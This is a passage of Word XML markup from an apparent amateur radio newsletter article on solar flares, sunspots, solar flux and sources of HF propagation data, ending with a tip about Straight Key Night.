        <w:t xml:space="preserve">Typically, several hours after a flare erupts at the Sun, particles begin to arrive at the Earth in the form of a </w:t>
      </w:r>
      <w:r w:rsidRPr="00B5211F">
        <w:rPr>
          <w:rFonts w:eastAsia="Lucida Sans Unicode"/>
          <w:i/>
          <w:kern w:val="1"/>
        </w:rPr>
        <w:t>plasma</w:t>
      </w:r>
      <w:r w:rsidRPr="00B5211F">
        <w:rPr>
          <w:rFonts w:eastAsia="Lucida Sans Unicode"/>
          <w:kern w:val="1"/>
        </w:rPr>
        <w:t>, a highly ionized gas made up of electrons, protons and neutral particles, traveling at speeds up to 300 miles per second. This may interact violently with the Earth's magnetic field. Really high-energy protons may even disable satellites orbiting high above the atmosphere.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="380F9D39" w14:textId="77777777" w:rsidR="00B5211F" w:rsidRPr="00B5211F" w:rsidRDefault="00B5211F" w:rsidP="00B5211F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:suppressAutoHyphens/>
        <w:spacing w:after="283"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Lucida Sans Unicode"/>
          <w:kern w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B5211F">
        <w:rPr>
          <w:rFonts w:eastAsia="Lucida Sans Unicode"/>
          <w:kern w:val="1"/>
        </w:rPr>
        <w:t xml:space="preserve">Another possible effect of a high-energy particle bombardment during a flare may be high absorption of HF </w:t>
      </w:r>
      <w:r w:rsidRPr="00B5211F">
        <w:rPr>
          <w:rFonts w:eastAsia="Lucida Sans Unicode"/>
          <w:kern w:val="1"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">signals propagating through the polar regions. This is called a </w:t>
      </w:r>
      <w:r w:rsidRPr="00B5211F">
        <w:rPr>
          <w:rFonts w:eastAsia="Lucida Sans Unicode"/>
          <w:i/>
          <w:kern w:val="1"/>
        </w:rPr>
        <w:t>Polar Cap Absorption</w:t>
      </w:r>
      <w:r w:rsidRPr="00B5211F">
        <w:rPr>
          <w:rFonts w:eastAsia="Lucida Sans Unicode"/>
          <w:kern w:val="1"/>
        </w:rPr>
        <w:t xml:space="preserve"> (PCA) event and it may last for several days</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A0F6DB2" w14:textId="77777777" w:rsidR="00B5211F" w:rsidRPr="00B5211F" w:rsidRDefault="00B5211F" w:rsidP="00B5211F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:suppressAutoHyphens/>
        <w:spacing w:after="283"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Lucida Sans Unicode"/>
          <w:kern w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B5211F">
        <w:rPr>
          <w:rFonts w:eastAsia="Lucida Sans Unicode"/>
          <w:kern w:val="1"/>
        </w:rPr>
        <w:t>Approximately how long does it take the increased ultraviolet and X-ray radiation from solar flares to affect radio propagation on the Earth? RF energy waves, such as ultraviolet and X-ray radiation, travel at the speed of light (approx. 300 million meters per second, or approx. 186,000 miles per second). The earth is about 93 million miles from the sun, and so it takes just over 8 minutes,</w:t>
      </w:r>
      <w:r w:rsidRPr="00B5211F">
        <w:rPr>
          <w:rFonts w:eastAsia="Lucida Sans Unicode"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00B5211F">
        <w:rPr>
          <w:rFonts w:eastAsia="Lucida Sans Unicode"/>
          <w:kern w:val="1"/>
        </w:rPr>
        <w:t>on average, for a burst of radiation from solar flares to affect radio-wave propagation on earth.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CF02546" w14:textId="77777777" w:rsidR="00B5211F" w:rsidRPr="00B5211F" w:rsidRDefault="00B5211F" w:rsidP="00B5211F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:suppressAutoHyphens/>
        <w:spacing w:after="283"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Lucida Sans Unicode"/>
          <w:kern w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B5211F">
        <w:rPr>
          <w:rFonts w:eastAsia="Lucida Sans Unicode"/>
          <w:kern w:val="1"/>
        </w:rPr>
        <w:t>What is the solar flux index? Measuring solar flux is another way of expressing the amount of solar activity. The solar flux is the intensity of the sun's RF energy emissions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33D2BF94" w14:textId="77777777" w:rsidR="00B5211F" w:rsidRPr="00B5211F" w:rsidRDefault="00B5211F" w:rsidP="00B5211F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:suppressAutoHyphens/>
        <w:spacing w:after="120"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Lucida Sans Unicode"/>
          <w:kern w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B5211F">
        <w:rPr>
          <w:rFonts w:eastAsia="Lucida Sans Unicode"/>
          <w:kern w:val="1"/>
        </w:rPr>
        <w:t xml:space="preserve">The Solar flux index is a standardized representative of this radiation energy which is measured at a fixed value of </w:t>
      </w:r>
      <w:r w:rsidRPr="00B5211F">
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New"/>
          <w:kern w:val="1"/>
        </w:rPr>
        <w:t>2800 MHz frequency (10.7 cm wavelength)</w:t>
      </w:r>
      <w:r w:rsidRPr="00B5211F">
        <w:rPr>
          <w:rFonts w:eastAsia="Lucida Sans Unicode"/>
          <w:kern w:val="1"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="370C5FBE" w14:textId="77777777" w:rsidR="00B5211F" w:rsidRPr="00B5211F" w:rsidRDefault="00B5211F" w:rsidP="00B5211F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:suppressAutoHyphens/>
        <w:spacing w:after="120"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Lucida Sans Unicode"/>
          <w:kern w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B5211F">
        <w:rPr>
          <w:rFonts w:eastAsia="Lucida Sans Unicode"/>
          <w:kern w:val="1"/>
        </w:rPr>
        <w:t>The advantage of this measurement over the sunspot index, is that it can be measured during any weather conditions - the sun doesn't have to be visible. The higher the solar flux index number, the greater the amount of solar activity indicated.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70C1C0BB" w14:textId="77777777" w:rsidR="00B5211F" w:rsidRPr="00B5211F" w:rsidRDefault="00B5211F" w:rsidP="00B5211F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:suppressAutoHyphens/>
        <w:spacing w:after="120"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Lucida Sans Unicode"/>
          <w:kern w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B5211F">
        <w:rPr>
          <w:rFonts w:eastAsia="Lucida Sans Unicode"/>
          <w:kern w:val="1"/>
        </w:rPr>
        <w:t xml:space="preserve">One of the best known gauges of overall solar activity is the number of </w:t>
      </w:r>
      <w:r w:rsidRPr="00B5211F">
        <w:rPr>
          <w:rFonts w:eastAsia="Lucida Sans Unicode"/>
          <w:i/>
          <w:kern w:val="1"/>
        </w:rPr>
        <w:t>sunspots</w:t>
      </w:r>
      <w:r w:rsidRPr="00B5211F">
        <w:rPr>
          <w:rFonts w:eastAsia="Lucida Sans Unicode"/>
          <w:kern w:val="1"/>
        </w:rPr>
        <w:t xml:space="preserve"> seen on the Sun's surface. Sunspots are relatively cool areas that appear as dark spots. (</w:t>
      </w:r>
      <w:r w:rsidRPr="00B5211F">
        <w:rPr>
          <w:rFonts w:eastAsia="Lucida Sans Unicode"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="1"/>
        </w:rPr>
        <w:t>CAUTION: Do not look at the Sun with the naked eye or a telescope; you could permanently damage your eyes.</w:t>
      </w:r>
      <w:r w:rsidRPr="00B5211F">
        <w:rPr>
          <w:rFonts w:eastAsia="Lucida Sans Unicode"/>
          <w:kern w:val="1"/>
        </w:rPr>
        <w:t>) Surprisingly, sunspots are not really dark, but appear so only because the surrounding surface is even hotter and brighter. A large sunspot can be up to 80,000 miles in diameter.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="540BB56D" w14:textId="77777777" w:rsidR="00B5211F" w:rsidRPr="00B5211F" w:rsidRDefault="00B5211F" w:rsidP="00B5211F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:suppressAutoHyphens/>
        <w:spacing w:after="120"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Lucida Sans Unicode"/>
          <w:kern w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B5211F">
        <w:rPr>
          <w:rFonts w:eastAsia="Lucida Sans Unicode"/>
          <w:kern w:val="1"/>
        </w:rPr>
        <w:t>Systematic study of solar activity began around 1750. Long-term sunspot activity varies in cycles. On average, the number of sunspots reaches a maximum every 11 years, but the period has varied from 7 to 17 years. The first cycle to be completely and scientifically observed began in 1755; we know it as Cycle 1. We are now just starting Cycle 23. Solar activity also follows a 27-day cycle: the sun's rotational period.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="603BFB3A" w14:textId="77777777" w:rsidR="00B5211F" w:rsidRPr="00B5211F" w:rsidRDefault="00B5211F" w:rsidP="00B5211F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:suppressAutoHyphens/>
        <w:spacing w:after="120"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Lucida Sans Unicode"/>
          <w:kern w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B5211F">
        <w:rPr>
          <w:rFonts w:eastAsia="Lucida Sans Unicode"/>
          <w:kern w:val="1"/>
        </w:rPr>
        <w:t>Sunspot activity changes continuously. A sunspot can vary in size and appearance, or even vanish, within a single day. Large areas of sunspot activity usually last through several rotations of the Sun, some as long as two years. To offset the confusing effects of short-term changes, we average (or smooth) solar data. HF propagation predictions commonly use Smoothed Sunspot Numbers (SSN), which are monthly sunspot counts averaged over a 12-month period.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7821B7BC" w14:textId="77777777" w:rsidR="00B5211F" w:rsidRPr="00B5211F" w:rsidRDefault="00B5211F" w:rsidP="00B5211F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:suppressAutoHyphens/>
        <w:spacing w:after="120"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Lucida Sans Unicode"/>
          <w:kern w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B5211F">
        <w:rPr>
          <w:rFonts w:eastAsia="Lucida Sans Unicode"/>
          <w:kern w:val="1"/>
        </w:rPr>
        <w:t>Solar-flux readings are another measure of solar activity. The average intensity of solar emissions also varies slowly over the 11-year solar cycle. A solar flux reading is a measure of power received, per unit area, per unit frequency. The Dominion Radio Astrophysical Observatory in Penticton, British Columbia, measures 2800-MHz (10.7-cm) solar-flux data daily at local noon. Solar flux correlates well with the intensity of ionizing UV and X-ray radiation. Smoothed Sunspot Numbers range from 0 to over 200 and solar-flux numbers range from 60 to 300.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40929511" w14:textId="3616830A" w:rsidR="00B5211F" w:rsidRPr="00B5211F" w:rsidRDefault="00B5211F" w:rsidP="00B5211F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:suppressAutoHyphens/>
        <w:rPr>
          <w:rFonts w:eastAsia="Lucida Sans Unicode"/>
          <w:kern w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B5211F">
        <w:rPr>
          <w:rFonts w:eastAsia="Lucida Sans Unicode"/>
          <w:noProof/>
          <w:kern w:val="1"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="253000704" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="6C5F4981" wp14:editId="5BA723D5">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>0</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4511040" cy="4072890"/>
            <wp:effectExtent l="0" t="0" r="3810" b="3810"/>
            <wp:wrapTopAndBottom/>
            <wp:docPr id="14" name="Picture 14" descr="A picture containing orange, bla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orange, black&#10;&#10;Description automatically generated"/>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511040" cy="407289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526D8B0F" w14:textId="77777777" w:rsidR="00B5211F" w:rsidRPr="00B5211F" w:rsidRDefault="00B5211F" w:rsidP="00B5211F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:suppressAutoHyphens/>
        <w:spacing w:after="120"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Lucida Sans Unicode"/>
          <w:kern w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B5211F">
        <w:rPr>
          <w:rFonts w:eastAsia="Lucida Sans Unicode"/>
          <w:kern w:val="1"/>
        </w:rPr>
        <w:t>SUN SPOTS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F7CAF24" w14:textId="77777777" w:rsidR="00B5211F" w:rsidRPr="00B5211F" w:rsidRDefault="00B5211F" w:rsidP="00B5211F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:suppressAutoHyphens/>
        <w:spacing w:after="120"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Lucida Sans Unicode"/>
          <w:kern w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B5211F">
        <w:rPr>
          <w:rFonts w:eastAsia="Lucida Sans Unicode"/>
          <w:kern w:val="1"/>
        </w:rPr>
        <w:t>There are many sources for numbers related to propagation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D57D91B" w14:textId="77777777" w:rsidR="00B5211F" w:rsidRPr="00B5211F" w:rsidRDefault="00B5211F" w:rsidP="00B5211F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:suppressAutoHyphens/>
        <w:spacing w:after="120"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Lucida Sans Unicode"/>
          <w:kern w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B5211F">
        <w:rPr>
          <w:rFonts w:eastAsia="Lucida Sans Unicode"/>
          <w:kern w:val="1"/>
        </w:rPr>
        <w:t>1) National Institute of Standards and Technology (NIST) stations WWV and WWVH broadcast propagation information on 2.5, 5, 10, 15 and 20 MHz (WWV only) at 18 and 45 minutes past each hour, respectively.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E30E9A1" w14:textId="77777777" w:rsidR="00B5211F" w:rsidRPr="00B5211F" w:rsidRDefault="00B5211F" w:rsidP="00B5211F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:suppressAutoHyphens/>
        <w:spacing w:after="120"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Lucida Sans Unicode"/>
          <w:color w:val="000080"/>
          <w:kern w:val="1"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B5211F">
        <w:rPr>
          <w:rFonts w:eastAsia="Lucida Sans Unicode"/>
          <w:kern w:val="1"/>
        </w:rPr>
        <w:t xml:space="preserve">2) The NIST in Boulder provides a telephone voice recording of the WWV/WWVH propagation message at 303-497-3235. There's also a continuous audio rebroadcast at 303-499-7111 (Colorado) and 808-335-4363 (Hawaii). NOAA provides the WWV solar-terrestrial data via several on-line services Gopher service is available by telephone bulletin board (303-497-7788; up to 28.8 kbps; login: gopher), telnet (telnet </w:t>
      </w:r>
      <w:r w:rsidRPr="00B5211F">
        <w:rPr>
          <w:rFonts w:eastAsia="Lucida Sans Unicode"/>
          <w:b/>
          <w:kern w:val="1"/>
        </w:rPr>
        <w:t>gopher.sec.noaa.gov</w:t>
      </w:r>
      <w:r w:rsidRPr="00B5211F">
        <w:rPr>
          <w:rFonts w:eastAsia="Lucida Sans Unicode"/>
          <w:kern w:val="1"/>
        </w:rPr>
        <w:t xml:space="preserve">; login: gopher) and on the Internet </w:t>
      </w:r>
      <w:r w:rsidRPr="00B5211F">
        <w:rPr>
          <w:rFonts w:eastAsia="Lucida Sans Unicode"/>
          <w:color w:val="000080"/>
          <w:kern w:val="1"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>https://www.swpc.noaa.gov/noaa-scales-explanation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="257F930A" w14:textId="77777777" w:rsidR="00B5211F" w:rsidRPr="00B5211F" w:rsidRDefault="00B5211F" w:rsidP="00B5211F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:suppressAutoHyphens/>
        <w:spacing w:after="120"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Lucida Sans Unicode"/>
          <w:kern w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B5211F">
        <w:rPr>
          <w:rFonts w:eastAsia="Lucida Sans Unicode"/>
          <w:kern w:val="1"/>
        </w:rPr>
        <w:t xml:space="preserve">3) When time permits, W1AW broadcasts a </w:t>
      </w:r>
      <w:r w:rsidRPr="00B5211F">
        <w:rPr>
          <w:rFonts w:eastAsia="Lucida Sans Unicode"/>
          <w:color w:val="000000"/>
          <w:kern w:val="1"/>
        </w:rPr>
        <w:t xml:space="preserve">weekly propagation forecast </w:t>
      </w:r>
      <w:r w:rsidRPr="00B5211F">
        <w:rPr>
          <w:rFonts w:eastAsia="Lucida Sans Unicode"/>
          <w:kern w:val="1"/>
        </w:rPr>
        <w:t xml:space="preserve">as part of the normal, daily bulletins. The W1AW schedule appears monthly in </w:t>
      </w:r>
      <w:r w:rsidRPr="00B5211F">
        <w:rPr>
          <w:rFonts w:eastAsia="Lucida Sans Unicode"/>
          <w:i/>
          <w:kern w:val="1"/>
        </w:rPr>
        <w:t xml:space="preserve">QST </w:t>
      </w:r>
      <w:r w:rsidRPr="00B5211F">
        <w:rPr>
          <w:rFonts w:eastAsia="Lucida Sans Unicode"/>
          <w:kern w:val="1"/>
        </w:rPr>
        <w:t xml:space="preserve">and at </w:t>
      </w:r>
      <w:hyperlink r:id="rId70" w:history="1">
        <w:r w:rsidRPr="00B5211F">
          <w:rPr>
            <w:rFonts w:eastAsia="Lucida Sans Unicode"/>
            <w:color w:val="000080"/>
            <w:kern w:val="1"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>http://www.arrl.org/w1aw-bulletins-archive-propagation.</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="2A38C066" w14:textId="77777777" w:rsidR="00B5211F" w:rsidRPr="00B5211F" w:rsidRDefault="00B5211F" w:rsidP="00B5211F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:suppressAutoHyphens/>
        <w:spacing w:after="120"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Lucida Sans Unicode"/>
          <w:kern w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B5211F">
        <w:rPr>
          <w:rFonts w:eastAsia="Lucida Sans Unicode"/>
          <w:kern w:val="1"/>
        </w:rPr>
        <w:t>4) There are numerous sources for solar and propagation data and information on the Internet. (A search for WWV yielded several hundred hits.)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E39D3C2" w14:textId="77777777" w:rsidR="00B5211F" w:rsidRPr="00B5211F" w:rsidRDefault="00B5211F" w:rsidP="00B5211F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:suppressAutoHyphens/>
        <w:spacing w:after="120"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Lucida Sans Unicode"/>
          <w:kern w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B5211F">
        <w:rPr>
          <w:rFonts w:eastAsia="Lucida Sans Unicode"/>
          <w:kern w:val="1"/>
        </w:rPr>
        <w:t xml:space="preserve">HF propagation is a complicated, fascinating topic. To further your knowledge of the ionosphere and solar-terrestrial interactions, you might want to read a book like </w:t>
      </w:r>
      <w:r w:rsidRPr="00B5211F">
        <w:rPr>
          <w:rFonts w:eastAsia="Lucida Sans Unicode"/>
          <w:i/>
          <w:kern w:val="1"/>
        </w:rPr>
        <w:t>Radio Amateur's Guide to the Ionosphere</w:t>
      </w:r>
      <w:r w:rsidRPr="00B5211F">
        <w:rPr>
          <w:rFonts w:eastAsia="Lucida Sans Unicode"/>
          <w:kern w:val="1"/>
        </w:rPr>
        <w:t>, by Leo F. McNamara.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B7D96FC" w14:textId="77777777" w:rsidR="00B5211F" w:rsidRPr="00B5211F" w:rsidRDefault="00B5211F" w:rsidP="00B5211F">
      <w:pPr>
        <w:keepNext/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:suppressAutoHyphens/>
        <w:spacing w:before="240" w:after="120"/>
        <w:outlineLvl w:val="1"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Lucida Sans Unicode"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B5211F">
        <w:rPr>
          <w:rFonts w:eastAsia="Lucida Sans Unicode"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="1"/>
        </w:rPr>
        <w:t>Summary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C1635C3" w14:textId="77777777" w:rsidR="00B5211F" w:rsidRPr="00B5211F" w:rsidRDefault="00B5211F" w:rsidP="00B5211F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:suppressAutoHyphens/>
        <w:spacing w:after="120"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Lucida Sans Unicode"/>
          <w:kern w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B5211F">
        <w:rPr>
          <w:rFonts w:eastAsia="Lucida Sans Unicode"/>
          <w:kern w:val="1"/>
        </w:rPr>
        <w:t xml:space="preserve">The sunspot activity is of great importance to anyone involved in HF radio communications. Whether two way radio communications, maritime mobile communications, general mobile communications, point to point radio </w:t>
      </w:r>
      <w:r w:rsidRPr="00B5211F">
        <w:rPr>
          <w:rFonts w:eastAsia="Lucida Sans Unicode"/>
          <w:kern w:val="1"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">links, amateur radio communications, or whatever form of radio communications. The level of sunspot activity has an enormous effect on the ionosphere and hence on HF radio propagation conditions. Accordingly even a superficial understanding is advantageous. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B194931" w14:textId="77777777" w:rsidR="00B5211F" w:rsidRPr="00B5211F" w:rsidRDefault="00B5211F" w:rsidP="00B5211F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:suppressAutoHyphens/>
        <w:spacing w:after="120"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Lucida Sans Unicode"/>
          <w:kern w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B5211F">
        <w:rPr>
          <w:rFonts w:eastAsia="Lucida Sans Unicode"/>
          <w:kern w:val="1"/>
        </w:rPr>
        <w:t>I am by no means an expert or even well informed on this subject but have tried to give you some information to get you started.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64199DFD" w14:textId="77777777" w:rsidR="00B5211F" w:rsidRPr="00B5211F" w:rsidRDefault="00B5211F" w:rsidP="00B5211F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:suppressAutoHyphens/>
        <w:spacing w:after="120"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Lucida Sans Unicode"/>
          <w:kern w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B5211F">
        <w:rPr>
          <w:rFonts w:eastAsia="Lucida Sans Unicode"/>
          <w:kern w:val="1"/>
        </w:rPr>
        <w:t>TIP OF THE MONTH</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45CECDCC" w14:textId="77777777" w:rsidR="00B5211F" w:rsidRPr="00B5211F" w:rsidRDefault="00B5211F" w:rsidP="00B5211F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:suppressAutoHyphens/>
        <w:rPr>
          <w:rFonts w:eastAsia="Lucida Sans Unicode"/>
          <w:kern w:val="1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="29B9F19D" w14:textId="77777777" w:rsidR="00B5211F" w:rsidRPr="00B5211F" w:rsidRDefault="00B5211F" w:rsidP="00B5211F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:suppressAutoHyphens/>
        <w:spacing w:after="120"/>
        <w:ind w:left="-2"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Lucida Sans Unicode"/>
          <w:kern w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B5211F">
        <w:rPr>
          <w:rFonts w:eastAsia="Lucida Sans Unicode"/>
          <w:kern w:val="1"/>
        </w:rPr>
        <w:t xml:space="preserve">Straight Key Night is held every January 1 from 0000 UTC through 2359 UTC. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D76DA17" w14:textId="77777777" w:rsidR="00B5211F" w:rsidRPr="00B5211F" w:rsidRDefault="00B5211F" w:rsidP="00B5211F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:suppressAutoHyphens/>
        <w:spacing w:after="120"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Lucida Sans Unicode"/>
          <w:kern w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B5211F">
        <w:rPr>
          <w:rFonts w:eastAsia="Lucida Sans Unicode"/>
          <w:kern w:val="1"/>
        </w:rPr>
        <w:t>This 24-hour event is not a contest; rather it is a day dedicated to celebrating our CW heritage. Participants are encouraged to get on the air and simply make enjoyable, conversational CW QSOs. The use of straight keys or bugs to send CW is preferred. There are no points scored and all who participate are winners.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33999E31" w14:textId="77777777" w:rsidR="00B5211F" w:rsidRPr="00B5211F" w:rsidRDefault="00B5211F" w:rsidP="00B5211F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:suppressAutoHyphens/>
        <w:spacing w:after="120"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Lucida Sans Unicode"/>
          <w:kern w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B5211F">
        <w:rPr>
          <w:rFonts w:eastAsia="Lucida Sans Unicode"/>
          <w:kern w:val="1"/>
        </w:rPr>
        <w:t xml:space="preserve">When participating in </w:t>
      </w:r>
      <w:r w:rsidRPr="00B5211F">
        <w:rPr>
          <w:rFonts w:eastAsia="Lucida Sans Unicode"/>
          <w:i/>
          <w:iCs/>
          <w:kern w:val="1"/>
        </w:rPr>
        <w:t>SKN</w:t>
      </w:r>
      <w:r w:rsidRPr="00B5211F">
        <w:rPr>
          <w:rFonts w:eastAsia="Lucida Sans Unicode"/>
          <w:kern w:val="1"/>
        </w:rPr>
        <w:t xml:space="preserve"> instead of sending RST before sending the signal report send the letters </w:t>
      </w:r>
      <w:r w:rsidRPr="00B5211F">
        <w:rPr>
          <w:rFonts w:eastAsia="Lucida Sans Unicode"/>
          <w:i/>
          <w:iCs/>
          <w:kern w:val="1"/>
        </w:rPr>
        <w:t>SKN</w:t>
      </w:r>
      <w:r w:rsidRPr="00B5211F">
        <w:rPr>
          <w:rFonts w:eastAsia="Lucida Sans Unicode"/>
          <w:kern w:val="1"/>
        </w:rPr>
        <w:t xml:space="preserve">, to indicate your participation, and to clue in passers-by who may be listening that </w:t>
      </w:r>
      <w:r w:rsidRPr="00B5211F">
        <w:rPr>
          <w:rFonts w:eastAsia="Lucida Sans Unicode"/>
          <w:i/>
          <w:iCs/>
          <w:kern w:val="1"/>
        </w:rPr>
        <w:t>SKN</w:t>
      </w:r>
      <w:r w:rsidRPr="00B5211F">
        <w:rPr>
          <w:rFonts w:eastAsia="Lucida Sans Unicode"/>
          <w:kern w:val="1"/>
        </w:rPr>
        <w:t xml:space="preserve"> is going strong. After </w:t>
      </w:r>
      <w:r w:rsidRPr="00B5211F">
        <w:rPr>
          <w:rFonts w:eastAsia="Lucida Sans Unicode"/>
          <w:i/>
          <w:iCs/>
          <w:kern w:val="1"/>
        </w:rPr>
        <w:t>SKN</w:t>
      </w:r>
      <w:r w:rsidRPr="00B5211F">
        <w:rPr>
          <w:rFonts w:eastAsia="Lucida Sans Unicode"/>
          <w:kern w:val="1"/>
        </w:rPr>
        <w:t xml:space="preserve">, send the Contest Branch a list of stations worked, plus your vote for the best fist you heard (it doesn’t have to be one you worked). Also, include your vote for the most interesting QSO you had or monitored. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27567E9E" w14:textId="77777777" w:rsidR="00B5211F" w:rsidRPr="00B5211F" w:rsidRDefault="00B5211F" w:rsidP="00B5211F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:suppressAutoHyphens/>
        <w:spacing w:after="120"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Lucida Sans Unicode"/>
          <w:kern w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B5211F">
        <w:rPr>
          <w:rFonts w:eastAsia="Lucida Sans Unicode"/>
          <w:kern w:val="1"/>
        </w:rPr>
